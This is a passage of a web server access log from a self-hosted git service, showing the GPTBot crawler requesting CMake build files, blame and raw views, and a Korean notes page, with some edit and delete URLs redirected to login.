+[17/Feb/2026:16:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33668] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14252] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10502] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14226] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43099] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21735] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13300] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14007] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10271] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33637] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11189] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fa.out" [Client 74.7.227.38] [Length 24206] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11028] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15260] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13297] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33374] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43071] [Gzip 19.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21704] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr 